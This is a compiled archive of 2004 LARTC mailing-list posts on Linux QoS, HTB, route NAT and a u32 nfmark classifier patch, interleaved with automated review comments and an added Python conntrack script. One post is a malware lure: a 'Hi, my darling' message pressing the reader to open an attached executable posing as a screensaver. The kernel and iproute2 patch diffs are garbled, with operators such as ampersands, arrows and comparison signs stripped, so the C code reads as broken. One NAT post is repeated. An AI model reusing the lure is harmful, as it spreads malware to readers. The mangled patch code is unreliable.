[LARTC] QoS and arp packets.
Hello list, I'm having problems with HTB on a machine. I noticed that after a while the machine seems off-line after I start the HTB script. After some debugging I realised the problem lies in the ARP packets sent by the machine, which are delayed or dropped. Because of that I had to remove the default class. Is there a way to match ARP packets? I want to add them to the class destined for the machine itself. Thanks in advance. ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
Re: [LARTC] ip route nat madness.
Hello. I need your help. The problem is I cannot make route nat work with kernel 2.6, although in 2.4 everything works perfectly. If this is the wrong list to ask questions about this, please poke me to the right one.

So. I have a router with two network cards: eth0 (192.168.1.10) and eth1 (192.168.2.150). Kernel is 2.6.8.1. In the kernel all options and suboptions concerning "IP: advanced router" are enabled. I want to map the computer in the 192.168.2.0/24 subnet with IP 192.168.2.5 onto 192.168.1.17 in the 192.168.1.0/24 subnet. I am not an artist, but maybe this graph can illustrate my situation:

192.168.1.0/24. nat 192.168.2.0/24 192.168.1.1-192.168.1.10router192.168.2.150-192.168.2.5 eth0eth1 host i want 192.168.1.17--nat to map dummy address

So, following ip-cref written by Alexey Kuznetsov, first of all I issue the command:

nat router # ip route add nat 192.168.1.17 via 192.168.2.5

Now my router answers ARP for 192.168.1.17 and receives the packets for it. Then it even routes them from eth0 to eth1, BUT it does not NAT the destination IP address. Look what one can see using tcpdump! I ping 172.16.1.17 from 192.168.1.1:

nat router # tcpdump -ni eth0
05:49:19.085838 arp who-has 192.168.1.17 tell 192.168.1.1
05:49:19.086938 arp reply 192.168.1.17 is-at 00:0c:29:od:85:04
05:49:19.692799 IP 192.168.1.1 192.168.1.17: icmp 64: echo request seq 1

At the same time on eth1:

nat router # tcpdump -ni eth0
05:49:19.692837 IP 192.168.1.1 192.168.1.17: icmp 64: echo request seq 1

My route table is OK.

nat router # ip route
192.168.2.0/24 dev eth1 proto kernel scope link src 192.168.2.250
192.168.1.0/24 dev eth1 proto kernel scope link src 192.168.1.10
127.0.0.0/8 via 127.0.0.1 dev lo scope link

So why is the packet that should be DNATed not, and how could a packet that should be sent to eth0 be sent to eth1? Is there any other possibility to NAT 192.168.2.5 onto 192.168.1.17? The last question: what is with "IP: fast network address translation" in the 2.6.9 kernel? Why is it absent?

Thank you in advance,
Peter.

P.S. I need your help to find a solution. Otherwise there is a possibility that my employer can dismiss me.

P.P.S. Below is also my letter with the same problem. No one answered it. :(

On Tuesday 26 October 2004 20:49, wrote:

All worked with the 2.4 kernel, but when I had to move to 2.6.8.1 it does not. I'm using ip route nat 231.222.222.111 via 172.16.1.13 to substitute inet address 231.222.222.111 on 172.16.1.13 during routing. Look at the output:

myhost log # ip route list table local
broadcast 127.255.255.255 dev lo proto kernel scope link src 127.0.0.1
local 172.16.0.1 dev eth1 proto kernel scope host src 172.16.0.1
broadcast 172.16.0.0 dev eth1 proto kernel scope link src 172.16.0.1
broadcast 231.222.222.111 dev eth0 proto kernel scope link src 231.222.222.111
broadcast 231.222.222.111 dev eth0 proto kernel scope link src 231.222.222.111
local 231.222.222.111 dev eth0 proto kernel scope host src 231.222.222.111
broadcast 172.16.255.255 dev eth1 proto kernel scope link src 172.16.0.1
broadcast 127.0.0.0 dev lo proto kernel scope link src 127.0.0.1
nat 231.222.222.111 via 172.16.1.13 scope host
local 127.0.0.1 dev lo proto kernel scope host src 127.0.0.1
local 127.0.0.0/8 dev lo proto kernel scope host src 127.0.0.1

myhost log # ip rule
0: from all lookup local
323: from 172.16.1.13 lookup main map-to 231.222.222.111
32766: from all lookup main
32767: from all lookup default

So I'm trying to translate local address 172.16.1.13 to 231.222.222.111. And that was working under the 2.4 kernel. But now I have to move to the 2.6 kernel and now it's not working. I've used these commands:

ip route add nat 231.222.222.111 via 172.16.1.13
ip rule add prio 323 from 172.16.1.13 nat 231.222.222.111

!!! To be sure that it is a kernel problem I've added these two rules at the very beginning of my FORWARD chain:

iptables -I FORWARD -s 172.16.1.13 -j LOG
iptables -I FORWARD -d 231.222.222.111 -j LOG

Look, I have packets that should not be there:

Oct 27 00:30:04 rcline IN=eth1 OUT=eth0 SRC=172.16.1.13 DST=64.12.161.185 LEN=48 TOS=0x00 PREC=0x00 TTL=127 ID=43039 DF PROTO=TCP SPT=1923 DPT=5190 WINDOW=65535 RES=0x00 SYN URGP=0
Oct 27 00:30:04 rcline IN=eth0 OUT=eth1 SRC=83.102.131.142 DST=231.222.222.111 LEN=84 TOS=0x00 PREC=0x00 TTL=59 ID=2990 DF PROTO=ICMP TYPE=8 CODE=0 ID=22310 SEQ=2991

No substitution of either destination or source addresses!!! Please help me to make this work. I've tried the 2.6.9 kernel, but it seems there is no "IP: fast network address translation". Why? Is the feature already deprecated?
[LARTC] [PATCH] Use nfmark as a key for u32 classifier
Hello! I am glad to announce a patch for u32 to allow matches on nfmark. The patch is non intrusive (few lines). Why I did this? Because fw classifier cannot be used together with u32. For example, now, you cannot match a mark of 0x90 and a destination port of 80. I know you can do it with iptables to do the marking, but if you use Jamal actions to apply mark to policed packets, you need this. All stuff can be found at http://kernel.umbrella.ro/ also. Dave, please consider adding this patch. Stephen, if Dave accepts the patch, please apply the iproute2 patch. Thank you. Signed-off-by: Catalin(ux aka Dino) BOIE catab at umbrella.ro Thank you for you time. --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/--- iproute2-2.6.9/tc/f_u32.c.orig 2004-11-04 15:38:53.0 +0200 +++ iproute2-2.6.9/tc/f_u32.c 2004-11-05 12:23:44.0 +0200 @@ -7,6 +7,7 @@ * 2 of the License, or (at your option) any later version. * * Authors:Alexey Kuznetsov, [EMAIL PROTECTED] + * Match mark added by Catalin(ux aka Dino) BOIE catab at umbrella.ro [5 nov 2004] * */ @@ -33,7 +34,7 @@ static void explain(void) fprintf(stderr, or u32 divisor DIVISOR\n); fprintf(stderr, \n); fprintf(stderr, Where: SELECTOR := SAMPLE SAMPLE ...\n); - fprintf(stderr,SAMPLE := { ip | ip6 | udp | tcp | icmp | u{32|16|8} } SAMPLE_ARGS\n); + fprintf(stderr,SAMPLE := { ip | ip6 | udp | tcp | icmp | u{32|16|8} | mark } SAMPLE_ARGS\n); fprintf(stderr,FILTERID := X:Y:Z\n); } @@ -590,7 +591,27 @@ done: return res; } +static int parse_mark(int *argc_p, char ***argv_p, struct tc_u32_sel *sel) +{ + int res = -1; + int argc = *argc_p; + char **argv = *argv_p; + + if (argc = 0) + return -1; + if (get_u32(res, *argv, 0)) { + fprintf(stderr, Illegal \mark\\n); + return -1; + } + NEXT_ARG(); + sel-mark = res; + res = 0; + + *argc_p = argc; + *argv_p = argv; + return res; +} static int parse_selector(int *argc_p, char ***argv_p, struct tc_u32_sel *sel) { 
@@ -641,6 +662,12 @@ static int parse_selector(int *argc_p, c res = parse_icmp(argc, argv, sel); goto done; } + if (matches(*argv, mark) == 0) { + NEXT_ARG(); + res = parse_mark(argc, argv, sel); + goto done; + } + return -1; done: @@ -969,6 +996,8 @@ static int u32_print_opt(struct filter_u struct tc_u32_key *key = sel-keys; if (show_stats NULL != pf) fprintf(f, (rule hit %llu success %llu),pf-rcnt,pf-rhit); + if (sel-mark) + fprintf(f, mark 0x%x, sel-mark); if (sel-nkeys) { for (i=0; isel-nkeys; i++, key++) { fprintf(f, \n match %08x/%08x at %s%d, --- iproute2-2.6.9/include/linux/pkt_cls.h.orig 2004-11-04 15:42:27.0 +0200 +++ iproute2-2.6.9/include/linux/pkt_cls.h 2004-11-05 11:12:22.0 +0200 @@ -208,6 +208,7 @@ struct tc_u32_sel unsigned char flags; unsigned char offshift; unsigned char nkeys; + __u32 mark; __u16 offmask; __u16 off; --- linux.orig/net/sched/cls_u32.c 2004-10-19 00:53:45.0 +0300 +++ linux/net/sched/cls_u32.c 2004-11-05 12:14:31.0 +0200 @@ -27,6 +27,7 @@ * JHS: We should remove the CONFIG_NET_CLS_IND from here * eventually when the meta match extension is made available * + * nfmark match added by Catalin(ux aka Dino) BOIE catab at umbrella.ro */ #include asm/uaccess.h @@ -139,6 +140,11 @@ next_knode: n-pf-rcnt +=1; j = 0; #endif + if ((n-sel.mark 0) (n-sel.mark != skb-nfmark)) { + n = n-next; + goto next_knode; + } + for (i = n-sel.nkeys; i0; i--, key++) { if ((*(u32*)(ptr+key-off+(off2key-offmask))^key-val)key-mask) { --- linux.orig/include/linux/pkt_cls.h 2004-10-19 00:53:07.0 +0300 +++ linux/include/linux/pkt_cls.h 2004-11-05 11:00:27.0 +0200 @@ -208,6 +208,7 @@ struct tc_u32_sel unsigned char flags; unsigned char offshift; unsigned char nkeys; + u32 mark; __u16 offmask; __u16 off;
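Review bot: parse_mark() in f_u32.c declares res as an int initialised to -1 and then uses that same variable both as the destination of get_u32() and as the function's return code. Use a separate __u32 local for the parsed value and keep an int only for the status, so the type matches what get_u32() writes and what is stored in sel->mark, and so a parsed value can never be confused with an error code.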
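Review bot: The test added after next_knode in net/sched/cls_u32.c treats sel.mark == 0 as "no mark requested", so a filter can never select packets whose nfmark is 0, and with no mask only exact values can be matched. The hunk also reads skb->nfmark with no #ifdef or Kconfig guard around it. A value/mask pair compared as (nfmark & mask) == val, compiled only when NETFILTER is configured, would cover both points.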
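Review bot: Both pkt_cls.h hunks insert the new mark field between nkeys and offmask in struct tc_u32_sel, which moves every later field of a structure that the iproute2 header and the kernel header both declare; a tc binary built against the old layout and a patched kernel (or the reverse) would then disagree on where offmask, off and the keys live. Carry the mark outside tc_u32_sel, for example in its own attribute, or at least leave the existing offsets unchanged. The two copies also differ in type (__u32 in the iproute2 header, u32 in the kernel header); a header shared with userspace should use __u32 in both.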
[LARTC] ppp nat mappings
Hi all, I hope I'm not totally wrong on this list. I set up a NAT router with the help of adsl-setup and shorewall. I've got a ppp link to the net and shorewall created the iptables. After a reconnect of the ppp link I get a new IP address, but as long as the existing kernel UDP mappings (which were created by outgoing UDP traffic) don't get timed out, the UDP packets the router sends out belonging to this mapping still contain the previous public IP address. I can see this in /proc/net/ip_conntrack and ethereal:

udp 17 178 src=192.168.0.160 dst=217.10.79.9 sport=5060 dport=5060 src=217.10.79.9 dst=80.135.x.y sport=5060 dport=5060 [ASSURED] use=1

But 80.135.x.y was my IP address some hours ago. If I stop sending UDP packets for about 5 minutes, the mapping is gone and replaced by a mapping containing the correct public IP address. ethereal shows that the source address of the outgoing UDP packets is the old address, so I'm spoofing my IP address. The kernel should notice that the IP address belonging to the mapping changed and remove the mapping, shouldn't it? Any suggestions on how to solve this problem?

Thanks, joe
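The comparison joe makes by eye, as an added example that is not part of the original post: the script reads entries in the /proc/net/ip_conntrack layout quoted above and lists NATed flows whose reply-direction destination is no longer the router's current public address. The sample lines, the documentation-range addresses and the function names are constructed for illustration.

```python
import ipaddress
import re

# Constructed sample in the /proc/net/ip_conntrack layout quoted in the post.
# Assumed roles: 192.168.0.0/24 is the LAN, 198.51.100.7 the public address
# held before the PPP reconnect, 198.51.100.99 the address held now.
SAMPLE = """\
udp      17 178 src=192.168.0.160 dst=203.0.113.9 sport=5060 dport=5060 src=203.0.113.9 dst=198.51.100.7 sport=5060 dport=5060 [ASSURED] use=1
udp      17 25 src=192.168.0.161 dst=203.0.113.53 sport=40000 dport=53 src=203.0.113.53 dst=198.51.100.99 sport=53 dport=40000 use=1
tcp      6 431999 ESTABLISHED src=192.168.0.160 dst=203.0.113.80 sport=34567 dport=80 src=203.0.113.80 dst=198.51.100.7 sport=80 dport=34567 [ASSURED] use=1
udp      17 10 src=192.168.0.160 dst=192.168.0.1 sport=1025 dport=53 src=192.168.0.1 dst=192.168.0.160 sport=53 dport=1025 use=1
"""

FIELD_RE = re.compile(r"\b(src|dst|sport|dport)=(\S+)")


def parse_entry(line):
    """Return one conntrack entry as a dict, or None if the line is unusable."""
    fields = line.split()
    if len(fields) < 4 or not fields[2].isdigit():
        return None
    orig, reply = {}, {}
    # The first src/dst/sport/dport group is the original direction, the
    # second group is the reply direction (the tuple the peer answers to).
    for key, value in FIELD_RE.findall(line):
        if key not in orig:
            orig[key] = value
        elif key not in reply:
            reply[key] = value
    try:
        return {
            "proto": fields[0],
            "timeout": int(fields[2]),
            "orig_src": ipaddress.ip_address(orig["src"]),
            "orig_dst": ipaddress.ip_address(orig["dst"]),
            "reply_dst": ipaddress.ip_address(reply["dst"]),
            "sport": orig.get("sport"),
            "dport": orig.get("dport"),
        }
    except (KeyError, ValueError):
        # Missing tuple, or a non-address such as a redacted "80.135.x.y".
        return None


def stale_mappings(text, current_ip, lan_cidr):
    """List source-NATed flows still bound to an address other than current_ip."""
    current = ipaddress.ip_address(current_ip)
    lan = ipaddress.ip_network(lan_cidr)
    stale = []
    for line in text.splitlines():
        entry = parse_entry(line)
        if entry is None:
            continue
        # A flow is source-NATed when it starts inside the LAN and the peer
        # replies to an address other than the original source.
        natted = (entry["orig_src"] in lan
                  and entry["reply_dst"] != entry["orig_src"])
        if natted and entry["reply_dst"] != current:
            stale.append(entry)
    return stale


if __name__ == "__main__":
    for e in stale_mappings(SAMPLE, "198.51.100.99", "192.168.0.0/24"):
        print("%s %s:%s -> %s:%s still mapped to %s (expires in %ds)" % (
            e["proto"], e["orig_src"], e["sport"], e["orig_dst"], e["dport"],
            e["reply_dst"], e["timeout"]))
```

Run from the PPP ip-up hook against the live table, this gives a list of the flows that will keep leaving with the old source address until their timers expire.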
[LARTC] What determines DROP versus delay (BACKLOG)?
HTB:

class htb 1:40 parent 1:1 leaf 40: prio 3 rate 358Kbit ceil 529Kbit \
 burst 6Kb cburst 2260b
 Sent 145871726 bytes 97293 pkts (dropped 69, overlimits 0)
 rate 56741bit 37pps backlog 23p
 lended: 77429 borrowed: 19841 giants: 0

I would like to increase backlog because I think that would decrease dropped. 23 packets of 1500 bytes each is only 34,500 bytes. IMO, there could be up to 64K bytes.

1) What determines backlog?
2) How can it be altered?
3) Am I on the right track here?

gypsy
[LARTC] Hi, my darling :)
Look at my new screensaver. I hope you will enjoy... Your Liza

[Attachment: SecUNCE.exe (application/x-msdownload)]
[LARTC] Re: [PATCH] Use nfmark as a key for u32 classifier
I think this is an ok midterm solution and should be applied. Thanks. One comment Catalin: Can you resend the patch make this a selectable choice via kconfig? Yes, of course. Also, as a bonus, I will add a mask. Something like this: tc filter add dev eth0 protocol ip parent 1:0 prio 5 u32 \ match mark 0x0090 0x \ ^^ flowid 1:90 It's ok? Eventually - we should kill this + the indev choices on u32 and move it up one so that we can have all filters capable of following filters from other classifiers. As a matter of fact we already have this feature but it is a little on the inefficient side at the moment. It will be very good. It will add the missing flexibility. I'll try to cook up something. cheers, jamal On Fri, 2004-11-05 at 06:38, Catalin(ux aka Dino) BOIE wrote: Hello! I am glad to announce a patch for u32 to allow matches on nfmark. The patch is non intrusive (few lines). Why I did this? Because fw classifier cannot be used together with u32. For example, now, you cannot match a mark of 0x90 and a destination port of 80. I know you can do it with iptables to do the marking, but if you use Jamal actions to apply mark to policed packets, you need this. All stuff can be found at http://kernel.umbrella.ro/ also. Dave, please consider adding this patch. Stephen, if Dave accepts the patch, please apply the iproute2 patch. Thank you. Signed-off-by: Catalin(ux aka Dino) BOIE catab at umbrella.ro Thank you for you time. --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/ --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/ ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
[LARTC] Re: [PATCH] Use nfmark as a key for u32 classifier
Catalin(ux aka Dino) BOIE wrote: Hello! I am glad to announce a patch for u32 to allow matches on nfmark. The patch is non intrusive (few lines). if ((*(u32*)(ptr+key-off+(off2key-offmask))^key-val)key-mask) { --- linux.orig/include/linux/pkt_cls.h 2004-10-19 00:53:07.0 +0300 +++ linux/include/linux/pkt_cls.h 2004-11-05 11:00:27.0 +0200 @@ -208,6 +208,7 @@ struct tc_u32_sel unsigned char flags; unsigned char offshift; unsigned char nkeys; + u32 mark; ^^ Please put this at the end to avoid breaking compatibility with old tc binaries. BTW, nfmark if unsigned long, which is 64 bit on 64-bit architectures. Probably not worth fixing though, everyone else got it wrong too. __u16 offmask; __u16 off; Regards Patrick ___ LARTC mailing list / [EMAIL PROTECTED] http://mailman.ds9a.nl/mailman/listinfo/lartc HOWTO: http://lartc.org/
[LARTC] Re: [PATCH] [TRY2] Use nfmark as a key in u32 classifier
On Tue, 9 Nov 2004, jamal wrote:

> Looks quite palatable. You didn't CC Dave for inclusion

Yes, I thought that he reads every message on netdev... I added him, thanks. Dave, please include it in the next release. Thank you.

> cheers,
> jamal
>
> On Tue, 2004-11-09 at 07:27, Catalin(ux aka Dino) BOIE wrote:
> > Hello! This is the try number two. What was changed:
> > - Added selectable choice in Kconfig file (thanks Jamal!)
> > - Don't abuse tc_u32_sel to not break backward compatibility (thanks Patrick!).
> > Stephen, do you have any comments on iproute2 part? I know it's not perfect but this is the best way, I think. u32 match mark it's intuitive but breaks a little the levels, u32 mark it's ok but not intuitive. If you want I can rewrite it if you want. Thank you for your time.
> > Signed-off-by: Catalin(ux aka Dino) catab at umbrella.ro
> > --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/

--- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/
[LARTC] Re: [PATCH] [TRY2] Use nfmark as a key in u32 classifier
* Catalin(ux aka Dino) BOIE [EMAIL PROTECTED] 2004-11-09 14:27

> This is the try number two. What was changed:
> - Added selectable choice in Kconfig file (thanks Jamal!)
> - Don't abuse tc_u32_sel to not break backward compatibility (thanks Patrick!).

Your patch looks fine except for the missing dependency on CONFIG_NETFILTER. Either make CLS_U32_MARK dependent on it or #ifdef the references to skb->nfmark. It might be fair to tell you that this code is likely to be removed again once we have the metadata match.

Cheers
[LARTC] Re: [PATCH] [TRY2] Use nfmark as a key in u32 classifier
* Catalin(ux aka Dino) BOIE [EMAIL PROTECTED] 2004-11-09 14:27 This is the try number two. What was changed: - Added selectable choice in Kconfig file (thanks Jamal!) - Don't abuse tc_u32_sel to not break backward compatibility (thanks Patrick!). Your patchs looks fine except for missing dependcy on CONFIG_NETFILTER. Either make CLS_U32_MARK dependant on it or #ifdef the references to skb-nfmark. Patch updated and attached. It might be fair to tell you that this code is likely to be removed again once we have the metadata match. Jamal already warned me about this. Is somebody already working on it? Cheers Thank you! --- Catalin(ux aka Dino) BOIE catab at deuroconsult.ro http://kernel.umbrella.ro/--- linux.orig/net/sched/Kconfig2004-10-19 00:55:06.0 +0300 +++ linux/net/sched/Kconfig 2004-11-09 15:39:47.0 +0200 @@ -334,6 +334,18 @@ config NET_CLS_IND Requires a new iproute2 You MUST NOT turn this on if you dont have an update iproute2. +config CLS_U32_MARK + bool Use nfmark as a key in U32 classifier + depends on NET_CLS_U32 NETFILTER + help + This allows you to match mark in a u32 filter. + Example: + tc filter add dev eth0 protocol ip parent 1:0 prio 5 u32 \ + match mark 0x0090 0x \ + match ip dst 4.4.4.4 \ + flowid 1:90 + You must use a new iproute2 to use this feature. + config NET_CLS_RSVP tristate Special RSVP classifier depends on NET_CLS NET_QOS --- linux.orig/net/sched/cls_u32.c 2004-10-19 00:53:45.0 +0300 +++ linux/net/sched/cls_u32.c 2004-11-09 13:56:42.0 +0200 @@ -27,6 +27,7 @@ * JHS: We should remove the CONFIG_NET_CLS_IND from here * eventually when the meta match extension is made available * + * nfmark match added by Catalin(ux aka Dino) BOIE catab at umbrella.ro */ #include asm/uaccess.h @@ -57,6 +58,13 @@ #include net/pkt_sched.h +struct tc_u32_mark +{ + __u32 val; + __u32 mask; + __u32 success; +}; + struct tc_u_knode { struct tc_u_knode *next; 
@@ -78,6 +86,9 @@ struct tc_u_knode #ifdef CONFIG_CLS_U32_PERF struct tc_u32_pcnt *pf; #endif +#ifdef CONFIG_CLS_U32_MARK + struct tc_u32_mark mark; +#endif struct tc_u32_sel sel; }; @@ -139,6 +150,16 @@ next_knode: n-pf-rcnt +=1; j = 0; #endif + +#ifdef CONFIG_CLS_U32_MARK + if ((skb-nfmark n-mark.mask) != n-mark.val) { + n = n-next; + goto next_knode; + } else { + n-mark.success++; + } +#endif + for (i = n-sel.nkeys; i0; i--, key++) { if ((*(u32*)(ptr+key-off+(off2key-offmask))^key-val)key-mask) { @@ -615,6 +636,7 @@ static int u32_change(struct tcf_proto * struct tc_u_hnode *ht; struct tc_u_knode *n; struct tc_u32_sel *s; + struct tc_u32_mark *mark; struct rtattr *opt = tca[TCA_OPTIONS-1]; struct rtattr *tb[TCA_U32_MAX]; u32 htid; @@ -718,6 +740,16 @@ static int u32_change(struct tcf_proto * } n-fshift = i; } + +#ifdef CONFIG_CLS_U32_MARK + if (tb[TCA_U32_MARK-1] == 0 || + RTA_PAYLOAD(tb[TCA_U32_MARK-1]) sizeof(struct tc_u32_mark)) + return -EINVAL; + mark = RTA_DATA(tb[TCA_U32_MARK-1]); + memcpy(n-mark, mark, sizeof(struct tc_u32_mark)); + n-mark.success = 0; +#endif + err = u32_set_parms(tp-q, base, ht, n, tb, tca[TCA_RATE-1]); if (err == 0) { struct tc_u_knode **ins; @@ -805,6 +837,12 @@ static int u32_dump(struct tcf_proto *tp RTA_PUT(skb, TCA_U32_CLASSID, 4, n-res.classid); if (n-ht_down) RTA_PUT(skb, TCA_U32_LINK, 4, n-ht_down-handle); + +#ifdef CONFIG_CLS_U32_MARK + if (n-mark.val || n-mark.mask) + RTA_PUT(skb, TCA_U32_MARK, sizeof(n-mark), n-mark); +#endif + #ifdef CONFIG_NET_CLS_ACT /* again for backward compatible mode - we want * to work with both old and new modes of entering --- linux.orig/include/linux/pkt_cls.h 2004-10-19 00:53:07.0 +0300 +++ linux/include/linux/pkt_cls.h 2004-11-09 09:50:45.0 +0200 @@ -190,6 +190,7 @@ enum TCA_U32_ACT, TCA_U32_INDEV, TCA_U32_PCNT, + TCA_U32_MARK, __TCA_U32_MAX };
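Review bot: In the u32_change() hunk, once CONFIG_CLS_U32_MARK is enabled a request with no TCA_U32_MARK attribute is rejected with -EINVAL, so every filter added by an iproute2 that does not send the attribute fails, not only filters that want to match a mark. Treat a missing attribute as "no mark match" (val and mask zero) and check RTA_PAYLOAD only when the attribute is present. The early return also comes after n has been filled in (n->fshift is assigned just above), so confirm that n is released on this path.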
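Review bot: struct tc_u32_mark is defined inside net/sched/cls_u32.c, yet u32_change() copies it directly out of the TCA_U32_MARK attribute payload and u32_dump() sends it back with RTA_PUT, so userspace needs the identical definition, including the success counter. Move the structure to include/linux/pkt_cls.h next to the new TCA_U32_MARK enum entry so tc and the kernel share one declaration.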
[LARTC] maybe OT, Linux TCP programming
Is there a way in Linux socket programming, when using TCP sockets, to be able to require notifications of when the TCP ACK packets are received? If I send some data over a TCP socket, I'd like to know for sure if the data reached its recipient. A blocking send call, that blocks until all ACKs for the data are received back, would be good enough.

-- damjan | This is my jabber ID -- [EMAIL PROTECTED] -- not my mail address!!!
[LARTC] Reset Statistics?
Is it possible to reset the statistics (ip -s link)? If not, why? Maybe there is a trick?

Regards
Sven

-- Sven Anders, ANDURAS service solutions AG
[LARTC] icmp
Is it possible to shape the ICMP protocol using the htb.init script?
[LARTC] HTB
Hello folks, I'm a complete beginner in Linux and traffic control. I have a lot of problems realizing the following scenario (I need it for my scholastics): 2 customers share one 2Mbit link. The packets of the customers are coming in on the interface with a NAT address each. Each of the customers should use only 1Mbit of the line.

192.168.0.1- - - customer1eth0 | | eth1customer1 ---| |-- customer22Mbit| | 2Mbit customer2 192.168.1.99 - - -

I think I have to use 2 scripts, one for each interface (on every side). I have written a small script, but I'm unsure if it works. It would be very nice if you could take a look at it and give me some hints.

Greetings
Marcus Schäfer

### Traffic Control ###

#!/bin/sh
# variables
ext_dev_1=eth0
# tc rate units: mbit/kbit are bits per second (mbps/kbps would be bytes per second)
bw=1mbit

# root qdisc for eth0
tc qdisc add dev $ext_dev_1 root handle 1: htb

# root class for customer 1 on eth0
tc class add dev $ext_dev_1 parent 1: classid 1:1 htb rate $bw ceil $bw prio 0
# 3 classes for customer 1 on eth0
tc class add dev $ext_dev_1 parent 1:1 classid 1:2 htb rate 450kbit ceil $bw prio 0
tc class add dev $ext_dev_1 parent 1:1 classid 1:3 htb rate 450kbit ceil $bw prio 1
tc class add dev $ext_dev_1 parent 1:1 classid 1:4 htb rate 100kbit ceil $bw prio 2

# root class for customer 2 on eth0
# (class ids must carry the major number of the qdisc they belong to, here 1:)
tc class add dev $ext_dev_1 parent 1: classid 1:10 htb rate $bw ceil $bw prio 0
# 3 classes for customer 2 on eth0, children of customer 2's root class
tc class add dev $ext_dev_1 parent 1:10 classid 1:12 htb rate 450kbit ceil $bw prio 0
tc class add dev $ext_dev_1 parent 1:10 classid 1:13 htb rate 450kbit ceil $bw prio 1
tc class add dev $ext_dev_1 parent 1:10 classid 1:14 htb rate 100kbit ceil $bw prio 2

# Filters which direct packets marked with iptables into the right classes
# Filters for customer 1 on eth0
tc filter add dev $ext_dev_1 parent 1: prio 0 protocol ip handle 1 fw flowid 1:2
tc filter add dev $ext_dev_1 parent 1: prio 1 protocol ip handle 2 fw flowid 1:3
tc filter add dev $ext_dev_1 parent 1: prio 2 protocol ip handle 3 fw flowid 1:4
# Filters for customer 2 on eth0
tc filter add dev $ext_dev_1 parent 1: prio 0 protocol ip handle 4 fw flowid 1:12
tc filter add dev $ext_dev_1 parent 1: prio 1 protocol ip handle 5 fw flowid 1:13
tc filter add dev $ext_dev_1 parent 1: prio 1 protocol ip handle 6 fw flowid 1:14

### iptables ###

ipt=/sbin/iptables

### mark unmatched packets ###
# MARK does not stop rule traversal, so the per-customer default marks are set
# first and the port-specific rules below overwrite them.
# mark packets with 3 which come from 192.168.0.1
$ipt -t mangle -A FORWARD -s 192.168.0.1 -j MARK --set-mark 3
# mark packets with 6 which come from 192.168.1.99
$ipt -t mangle -A FORWARD -s 192.168.1.99 -j MARK --set-mark 6

### mark packets for customer 1 on eth0 ###
# mark packets with 1 which come from 192.168.0.1 and have a source port of 80
$ipt -t mangle -A FORWARD -s 192.168.0.1 -p tcp --sport 80 -j MARK --set-mark 1
# mark packets with 2 which come from 192.168.0.1 and have a source port of 22
$ipt -t mangle -A FORWARD -s 192.168.0.1 -p tcp --sport 22 -j MARK --set-mark 2

### mark packets for customer 2 on eth0 ###
# mark packets with 4 which come from 192.168.1.99 and have a source port of 80
$ipt -t mangle -A FORWARD -s 192.168.1.99 -p tcp --sport 80 -j MARK --set-mark 4
# mark packets with 5 which come from 192.168.1.99 and have a source port of 22
$ipt -t mangle -A FORWARD -s 192.168.1.99 -p tcp --sport 22 -j MARK --set-mark 5
Re: [LARTC] ip route nat. NEED help.
Hello. I need your help. The problem is I cannot make route nat work with kernel 2.6, although in 2.4 everything works perfectly. I am forced to have a 2.6 kernel as I need SATA. If this is the wrong list to ask questions about this, please poke me to the right one.

So. I have a router with two network cards: eth0 (192.168.1.10) and eth1 (192.168.2.150). Kernel is 2.6.8.1. In the kernel all options and suboptions concerning "IP: advanced router" are enabled. I want to map the computer in the 192.168.2.0/24 subnet with IP 192.168.2.5 onto 192.168.1.17 in the 192.168.1.0/24 subnet. I am not an artist, but maybe this graph can illustrate my situation:

192.168.1.0/24. nat 192.168.2.0/24 192.168.1.1-192.168.1.10router192.168.2.150-192.168.2.5 eth0eth1 host i want 192.168.1.17--nat to map dummy address

So, following ip-cref written by Alexey Kuznetsov, first of all I issue the command:

nat router # ip route add nat 192.168.1.17 via 192.168.2.5

Now my router answers ARP for 192.168.1.17 and receives the packets for it. Then it even routes them from eth0 to eth1, BUT it does not NAT the destination IP address. Look what one can see using tcpdump! I ping 172.16.1.17 from 192.168.1.1:

nat router # tcpdump -ni eth0
05:49:19.085838 arp who-has 192.168.1.17 tell 192.168.1.1
05:49:19.086938 arp reply 192.168.1.17 is-at 00:0c:29:od:85:04
05:49:19.692799 IP 192.168.1.1 192.168.1.17: icmp 64: echo request seq 1

At the same time on eth1:

nat router # tcpdump -ni eth0
05:49:19.692837 IP 192.168.1.1 192.168.1.17: icmp 64: echo request seq 1

My route table is OK.

nat router # ip route
192.168.2.0/24 dev eth1 proto kernel scope link src 192.168.2.250
192.168.1.0/24 dev eth1 proto kernel scope link src 192.168.1.10
127.0.0.0/8 via 127.0.0.1 dev lo scope link

So why is the packet that should be DNATed not, and how could a packet that should be sent to eth0 be sent to eth1? Is there any other possibility to NAT 192.168.2.5 onto 192.168.1.17? The last question: what is with "IP: fast network address translation" in the 2.6.9 kernel? Why is it absent?

Thank you in advance,
Peter.

P.S. I need your help to find a solution. Otherwise there is a possibility that my employer can dismiss me.

P.P.S. Below is also my letter with the same problem. No one answered it. :(

On Tuesday 26 October 2004 20:49, wrote:

All worked with the 2.4 kernel, but when I had to move to 2.6.8.1 it does not. I'm using ip route nat 231.222.222.111 via 172.16.1.13 to substitute inet address 231.222.222.111 on 172.16.1.13 during routing. Look at the output:

myhost log # ip route list table local
broadcast 127.255.255.255 dev lo proto kernel scope link src 127.0.0.1
local 172.16.0.1 dev eth1 proto kernel scope host src 172.16.0.1
broadcast 172.16.0.0 dev eth1 proto kernel scope link src 172.16.0.1
broadcast 231.222.222.111 dev eth0 proto kernel scope link src 231.222.222.111
broadcast 231.222.222.111 dev eth0 proto kernel scope link src 231.222.222.111
local 231.222.222.111 dev eth0 proto kernel scope host src 231.222.222.111
broadcast 172.16.255.255 dev eth1 proto kernel scope link src 172.16.0.1
broadcast 127.0.0.0 dev lo proto kernel scope link src 127.0.0.1
nat 231.222.222.111 via 172.16.1.13 scope host
local 127.0.0.1 dev lo proto kernel scope host src 127.0.0.1
local 127.0.0.0/8 dev lo proto kernel scope host src 127.0.0.1

myhost log # ip rule
0: from all lookup local
